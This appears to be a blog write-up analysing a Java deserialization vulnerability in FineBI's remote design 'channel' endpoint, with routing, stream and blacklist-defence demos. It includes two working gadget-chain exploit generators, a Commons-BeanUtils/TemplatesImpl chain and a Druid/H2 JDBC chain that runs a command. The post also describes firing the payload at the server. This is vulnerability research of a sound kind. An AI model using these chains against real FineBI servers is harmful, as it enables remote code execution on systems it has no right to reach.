Quick notes.



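Trigger point analysis

The code I'm working with is FineBI 5.1.0. In this version routing is implemented with annotations, and since this is a reproduction I went straight to the vulnerable endpoint.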

The `channel` endpoint is the vulnerable point. Every endpoint in this file sits under the `/remote/design` route.

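To actually reach it, though, the path also needs the `/decision/` prefix, and `/webroot/` is presumably the project's directory name (the context path). I couldn't find where the routes are actually defined, so this is only a guess; I clearly need more practice with route analysis...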
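Since I didn't find FineBI's routing code, here is only a generic sketch of how annotation-based routing usually composes a path from a class-level and a method-level annotation. The `@Route` annotation, the `RemoteDesignResource` class and the `/webroot/decision` prefix are hypothetical stand-ins chosen to match the guess above, not FineBI's real API.

```java
import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;
import java.lang.reflect.Method;

// Hypothetical routing annotation (not FineBI's real one).
@Retention(RetentionPolicy.RUNTIME)
@Target({ElementType.TYPE, ElementType.METHOD})
@interface Route {
    String value();
}

// Hypothetical controller mirroring the layout seen in the decompiled code.
@Route("/remote/design")
class RemoteDesignResource {
    @Route("/channel")
    public void channel() { }
}

public class RouteDemo {
    // Joins prefix + class-level path + method-level path.
    static String resolve(String prefix, Class<?> type, String methodName) throws NoSuchMethodException {
        Route base = type.getAnnotation(Route.class);
        Method method = type.getMethod(methodName);
        Route leaf = method.getAnnotation(Route.class);
        return prefix + base.value() + leaf.value();
    }

    public static void main(String[] args) throws Exception {
        // Assumed prefix: /webroot (context path) + /decision (servlet mapping).
        System.out.println(resolve("/webroot/decision", RemoteDesignResource.class, "channel"));
        // prints /webroot/decision/remote/design/channel
    }
}
```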



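Inside `channel`, the request is obtained, converted into an input stream, and then written into an output stream (I really need to study Java I/O streams properly, they had me confused). Along the way `WorkContext.handleMessage()` is called to process the request, so let's follow that method.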
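The "input stream to output stream" step is the standard Java buffered-copy idiom. A minimal sketch of it (my own code, not FineBI's), with a `ByteArrayInputStream` standing in for the servlet request's input stream; the point for this analysis is that whatever bytes arrive in the request body come out unchanged on the other side.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;

public class StreamCopyDemo {
    // Copies the whole stream into memory using a fixed-size buffer.
    static byte[] readAll(InputStream in) throws IOException {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        byte[] buf = new byte[4096];
        int n;
        while ((n = in.read(buf)) != -1) {
            out.write(buf, 0, n);
        }
        return out.toByteArray();
    }

    public static void main(String[] args) throws IOException {
        // Stand-in for request.getInputStream(); no servlet container needed.
        InputStream body = new ByteArrayInputStream("hello".getBytes(StandardCharsets.UTF_8));
        System.out.println(readAll(body).length); // 5
    }
}
```

On Java 9+ `InputStream.readAllBytes()` does the same thing in one call.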



`messageListener` is a `WorkspaceMessageHandler`, so the call lands on that interface. There seems to be only one class implementing it; clicking through jumped straight to it.







Here is a method that looks like deserialization, `deserializeInvocation`. Follow it.



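Now pay attention: besides our controllable argument flowing in here, the call also executes `GZipSerializerWrapper.wrap(InvocationSerializer.getDefault())`. What gets passed to `wrap` is an instance of `InvocationSerializer`, so let's follow `wrap`.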

Following into the class:



In the constructor, `this.serializer` is the `InvocationSerializer` instance. This will matter later. Back to where we were:

```java
private Invocation deserializeInvocation(byte[] paramArrayOfbyte, FineResult paramFineResult) throws Exception {
    try {
        return SerializerHelper.<Invocation>deserialize(paramArrayOfbyte,
                GZipSerializerWrapper.wrap(InvocationSerializer.getDefault()));
    } catch (Exception exception) {
        paramFineResult.setResult(null);
        paramFineResult.setException(exception);
        throw exception;
    }
}
```





Keep following this `deserialize`.

The controllable argument reaches deserialization here. The deserializer `paramSerializer` is the `GZipSerializerWrapper` analyzed above; follow its `deserialize`.



Here we obviously want the second one.

And `this.serializer` here is the `InvocationSerializer` instance analyzed above, so we follow `deserialize` once more.
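The delegation traced above is a plain decorator: the gzip wrapper only strips the compression layer and hands the stream to the serializer it wraps. The sketch below uses hypothetical, simplified names (`SimpleSerializer`, `JdkSerializer`, `GZipWrapper`), not FineBI's real classes or signatures; `JdkSerializer` stands in for `InvocationSerializer`, which per this analysis ends in `readObject` calls. It shows why any gzip-compressed serialized bytes in the request body reach `readObject`.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;

// Hypothetical simplified serializer interface.
interface SimpleSerializer<T> {
    void serialize(T obj, OutputStream out) throws Exception;
    T deserialize(InputStream in) throws Exception;
}

// Inner serializer: plain Java serialization (stand-in for InvocationSerializer).
class JdkSerializer<T> implements SimpleSerializer<T> {
    public void serialize(T obj, OutputStream out) throws Exception {
        ObjectOutputStream oos = new ObjectOutputStream(out);
        oos.writeObject(obj);
        oos.flush();
    }

    @SuppressWarnings("unchecked")
    public T deserialize(InputStream in) throws Exception {
        return (T) new ObjectInputStream(in).readObject(); // the sink
    }
}

// Decorator: adds/removes gzip, then delegates to the wrapped serializer.
class GZipWrapper<T> implements SimpleSerializer<T> {
    private final SimpleSerializer<T> serializer;

    private GZipWrapper(SimpleSerializer<T> serializer) { this.serializer = serializer; }

    static <T> GZipWrapper<T> wrap(SimpleSerializer<T> inner) { return new GZipWrapper<>(inner); }

    public void serialize(T obj, OutputStream out) throws Exception {
        GZIPOutputStream gz = new GZIPOutputStream(out);
        serializer.serialize(obj, gz);
        gz.finish();
    }

    public T deserialize(InputStream in) throws Exception {
        return serializer.deserialize(new GZIPInputStream(in));
    }
}

public class WrapperDemo {
    public static void main(String[] args) throws Exception {
        SimpleSerializer<String> s = GZipWrapper.wrap(new JdkSerializer<String>());
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        s.serialize("invocation", bos);
        System.out.println(s.deserialize(new ByteArrayInputStream(bos.toByteArray()))); // invocation
    }
}
```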



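This time pick the fourth one. With a debugger you wouldn't need to reason this out, you could just step along, but my debugging environment wasn't set up...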

Two `readObject` calls appear: this is the end point of our deserialization.



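Chain construction

CB chain

The simple way to build a chain is to first look for dependencies with known historical vulnerabilities, since that makes a trigger point easier to find. At first glance there's no familiar dependency, but FanRuan bundles them internally, mostly in the jar below: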

It's clearly a Commons-BeanUtils (CB) dependency, but the version isn't obvious, so I just used the jar from the source directly.

```java
import com.jcraft.jzlib.GZIPInputStream;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;

import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.PriorityQueue;
import java.util.zip.GZIPOutputStream;

public class CB1 {
    public static void main(String[] args) throws Exception {
        byte[] bytes = Files.readAllBytes(Paths.get("E:\\evil.class"));
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_bytecodes", new byte[][]{bytes});
        setFieldValue(templates, "_name", "evil");
        setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());

        BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
        PriorityQueue queue = new PriorityQueue(2, beanComparator);
        queue.add("a");
        queue.add("b");

        setFieldValue(beanComparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{templates, templates});

        Unserialize("H4sIAAAAAAAAAK1Uz2/cRBh9s3Z2ky.....");
    }

    public static void Serialize(Object object) throws Exception {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(object);
        final ByteArrayOutputStream baos3 = new ByteArrayOutputStream();
        final GZIPOutputStream gos3 = new GZIPOutputStream(baos3);
        gos3.write(baos.toByteArray());
        gos3.finish();
        String base64str = Base64.getEncoder().encodeToString(baos3.toByteArray());
        System.out.println(base64str);
    }

    public static void Unserialize(String base64str) throws Exception {
        final ByteArrayInputStream bais = new ByteArrayInputStream(Base64.getDecoder().decode(base64str));
        final GZIPInputStream gis = new GZIPInputStream(bais);
        ObjectInputStream ois = new ObjectInputStream(gis);
        ois.readObject();
    }

    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
}
```
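Why the chain fires at all: `PriorityQueue.readObject` rebuilds its heap after reading the elements, which calls the queue's comparator; in the CB chain that comparator is `BeanComparator`, whose `compare()` reads the configured property through its getter (here `getOutputProperties()` on `TemplatesImpl`). The harmless sketch below demonstrates only the first half, that deserializing a `PriorityQueue` invokes its comparator; `CountingComparator` is my own illustrative class, not part of any library.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.Comparator;
import java.util.PriorityQueue;

public class PriorityQueueTriggerDemo {
    // Incremented every time the comparator runs in this JVM.
    static int compareCalls = 0;

    // Harmless Serializable comparator standing in for BeanComparator.
    static class CountingComparator implements Comparator<String>, Serializable {
        private static final long serialVersionUID = 1L;

        @Override
        public int compare(String a, String b) {
            compareCalls++;
            return a.compareTo(b);
        }
    }

    // Serializes a two-element queue, then counts the compare() calls made
    // purely by ObjectInputStream.readObject() while rebuilding it.
    static int comparesDuringDeserialization() throws Exception {
        PriorityQueue<String> queue = new PriorityQueue<>(2, new CountingComparator());
        queue.add("a");
        queue.add("b");

        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(queue);
        }

        compareCalls = 0; // ignore the calls made by add()
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bos.toByteArray()))) {
            ois.readObject();
        }
        return compareCalls;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("compare() calls during readObject: " + comparesDuringDeserialization());
    }
}
```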





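Sending the request with Yakit is convenient. Because the server-side code does not base64-decode the body, I used a Yakit fuzztag to decode the base64 payload into raw bytes before sending.

The calculator pops up.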
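Since there is no base64 step on the server, the body has to be the raw gzip bytes, whose decompressed content starts with the Java serialization header. A small diagnostic sketch (my own helper, not part of FineBI or Yakit) that checks this shape, using a harmless serialized `String` as the sample:

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.EOFException;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamConstants;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;

public class PayloadShapeCheck {
    // True when data is gzip (magic 1f 8b) and the decompressed bytes begin
    // with the Java serialization header AC ED 00 05. A corrupt gzip body
    // surfaces as an IOException from GZIPInputStream.
    static boolean isGzippedJavaSerialization(byte[] data) throws IOException {
        if (data.length < 2 || (data[0] & 0xff) != 0x1f || (data[1] & 0xff) != 0x8b) {
            return false;
        }
        try (DataInputStream in = new DataInputStream(
                new GZIPInputStream(new ByteArrayInputStream(data)))) {
            return in.readShort() == ObjectStreamConstants.STREAM_MAGIC
                    && in.readShort() == ObjectStreamConstants.STREAM_VERSION;
        } catch (EOFException e) {
            return false; // decompressed content shorter than the header
        }
    }

    // Harmless sample body: gzip(Java-serialized String).
    static byte[] sample() throws IOException {
        ByteArrayOutputStream raw = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(new GZIPOutputStream(raw))) {
            oos.writeObject("hello");
        }
        return raw.toByteArray();
    }

    public static void main(String[] args) throws IOException {
        byte[] body = sample();
        String asText = Base64.getEncoder().encodeToString(body);
        System.out.println(isGzippedJavaSerialization(body)); // true
        // Base64 text starts with "H4sI", not 1f 8b, so it is rejected.
        System.out.println(isGzippedJavaSerialization(asText.getBytes(StandardCharsets.US_ASCII))); // false
    }
}
```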

In 5.1.18 this payload no longer works: the original input stream object has been replaced by `JDKSerializer.CustomObjectInputStream`, which refuses to deserialize any class on a blacklist.
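A blacklisting `ObjectInputStream` is typically built by overriding `resolveClass`, which runs for each (non-proxy) class descriptor before any instance of that class is created. The sketch below shows the general technique only; the blacklist contents are hypothetical, picked to block the CB chain above, and are not FineBI's actual list.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.Arrays;
import java.util.HashSet;
import java.util.PriorityQueue;
import java.util.Set;

public class BlacklistDemo {
    // Hypothetical blacklist for illustration only.
    static final Set<String> BLACKLIST = new HashSet<>(Arrays.asList(
            "java.util.PriorityQueue",
            "org.apache.commons.beanutils.BeanComparator",
            "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"));

    static class BlacklistObjectInputStream extends ObjectInputStream {
        BlacklistObjectInputStream(InputStream in) throws IOException {
            super(in);
        }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
            // Reject by name before the class is resolved or instantiated.
            if (BLACKLIST.contains(desc.getName())) {
                throw new InvalidClassException(desc.getName(), "blacklisted class");
            }
            return super.resolveClass(desc);
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    static Object deserialize(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new BlacklistObjectInputStream(new ByteArrayInputStream(data))) {
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(deserialize(serialize("allowed"))); // allowed
        try {
            deserialize(serialize(new PriorityQueue<String>()));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

A blacklist only stops the classes it names; since JDK 9 the standard `java.io.ObjectInputFilter` API (JEP 290) can express the same check, and an allowlist is generally the sturdier choice.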

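A chain I don't know the name of

This chain was public only briefly before the article was taken down. The PoC below requires the H2 library, which is not present by default; the database library that ships by default is HSQLDB.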

```java
import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fr.json.JSONArray;
import sun.misc.Unsafe;

import java.io.*;
import java.lang.reflect.Field;
import java.util.*;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;

public class sql {
    public static void main(String[] args) throws Exception {
        String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
                "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
                "java.lang.Runtime.getRuntime().exec('calc')\n" +
                "$$\n";

        DruidXADataSource druidXADataSource = new DruidXADataSource();
        druidXADataSource.setLogWriter(null);
        druidXADataSource.setStatLogger(null);
        druidXADataSource.setUrl(url);
        druidXADataSource.setInitialSize(1);

        ArrayList<Object> arrayList = new ArrayList<>();
        arrayList.add(druidXADataSource);
        JSONArray objects = new JSONArray(arrayList);

        Map textAndMnemonicHashMap1 = (Map) getUnsafe().allocateInstance(Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap"));
        Map textAndMnemonicHashMap2 = (Map) getUnsafe().allocateInstance(Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap"));
        textAndMnemonicHashMap1.put(objects, "yy");
        textAndMnemonicHashMap2.put(objects, "zZ");

        Field transactionHistogram = DruidAbstractDataSource.class.getDeclaredField("transactionHistogram");
        transactionHistogram.setAccessible(true);
        transactionHistogram.set(druidXADataSource, null);
        Field initedLatch = DruidDataSource.class.getDeclaredField("initedLatch");
        initedLatch.setAccessible(true);
        initedLatch.set(druidXADataSource, null);

        Field field = HashMap.class.getDeclaredField("loadFactor");
        field.setAccessible(true);
        field.set(textAndMnemonicHashMap1, 1);
        Field field1 = HashMap.class.getDeclaredField("loadFactor");
        field1.setAccessible(true);
        field1.set(textAndMnemonicHashMap2, 1);

        Hashtable<Object, Object> hashtable = new Hashtable<>();
        hashtable.put(textAndMnemonicHashMap1, 1);
        hashtable.put(textAndMnemonicHashMap2, 1);
        textAndMnemonicHashMap1.put(objects, null);
        textAndMnemonicHashMap2.put(objects, null);

        Unserialize("H4sIAAAAAAAAAKVZXWwcVxW+69iJYzv+i2MnaZIacJuEtLslCW0aKyS.....");
    }

    public static void Serialize(Object object) throws Exception {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(object);
        final ByteArrayOutputStream baos3 = new ByteArrayOutputStream();
        final GZIPOutputStream gos3 = new GZIPOutputStream(baos3);
        gos3.write(baos.toByteArray());
        gos3.finish();
        String base64str = Base64.getEncoder().encodeToString(baos3.toByteArray());
        System.out.println(base64str);
    }

    public static void Unserialize(String base64str) throws Exception {
        final ByteArrayInputStream bais = new ByteArrayInputStream(Base64.getDecoder().decode(base64str));
        final GZIPInputStream gis = new GZIPInputStream(bais);
        ObjectInputStream ois = new ObjectInputStream(gis);
        ois.readObject();
    }

    public static Unsafe getUnsafe() throws Exception {
        Field unsafeField = Unsafe.class.getDeclaredField("theUnsafe");
        unsafeField.setAccessible(true);
        Unsafe unsafe = (Unsafe) unsafeField.get(null);
        return unsafe;
    }
}
```
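The entry point of this PoC is a `Hashtable` holding two maps whose `hashCode()` values collide: `"yy"` and `"zZ"` have the same `String.hashCode()` (both 3872), so two maps with the same key and those values hash identically without being equal. `Hashtable` compares colliding keys with `equals()`, both in `put()` and when `readObject` re-inserts entries, and `AbstractMap.equals()` calls `get()` on the other map, which is where the overridden `get()` of `TextAndMnemonicHashMap` comes in. The sketch below reproduces only the collision and the resulting `get()` call with a harmless `TracingMap` (my own stand-in, not the JDK class).

```java
import java.util.HashMap;
import java.util.Hashtable;

public class CollisionDemo {
    static int getCalls = 0;

    // Harmless stand-in for UIDefaults$TextAndMnemonicHashMap: only counts get() calls.
    static class TracingMap extends HashMap<Object, Object> {
        private static final long serialVersionUID = 1L;

        @Override
        public Object get(Object key) {
            getCalls++;
            return super.get(key);
        }
    }

    // Inserts two colliding, unequal maps into a Hashtable and returns
    // how many times get() was reached through equals().
    static int getCallsDuringInsert() {
        getCalls = 0;
        Object sharedKey = "key";
        TracingMap m1 = new TracingMap();
        TracingMap m2 = new TracingMap();
        m1.put(sharedKey, "yy");
        m2.put(sharedKey, "zZ");

        Hashtable<Object, Object> table = new Hashtable<>();
        table.put(m1, 1);
        table.put(m2, 1); // same hash -> m1.equals(m2) -> m2.get(sharedKey)
        return getCalls;
    }

    public static void main(String[] args) {
        System.out.println("yy".hashCode() == "zZ".hashCode()); // true
        System.out.println("get() calls: " + getCallsDuringInsert());
    }
}
```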

References

FanRuan FineReport/FineBI channel deserialization vulnerability analysis (CSDN blog)

https://forum.butian.net/share/2806

https://xz.aliyun.com/t/14800